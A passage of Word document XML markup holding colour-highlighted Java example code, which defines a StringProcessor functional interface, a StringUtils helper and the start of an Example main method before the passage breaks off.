    <w:p w14:paraId="78E49F91" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@FunctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA72A3" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringProcessor</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729CC5E2" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> process</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036053E2" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217EC46B" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17420302" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringUtils</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A17CD" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> processString</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringProcessor</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> processor</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EFF688" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> processor</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D177D4" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EED13D" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DDE71B" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F7B767" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B438D90" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399A880F" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> result </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringUtils</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
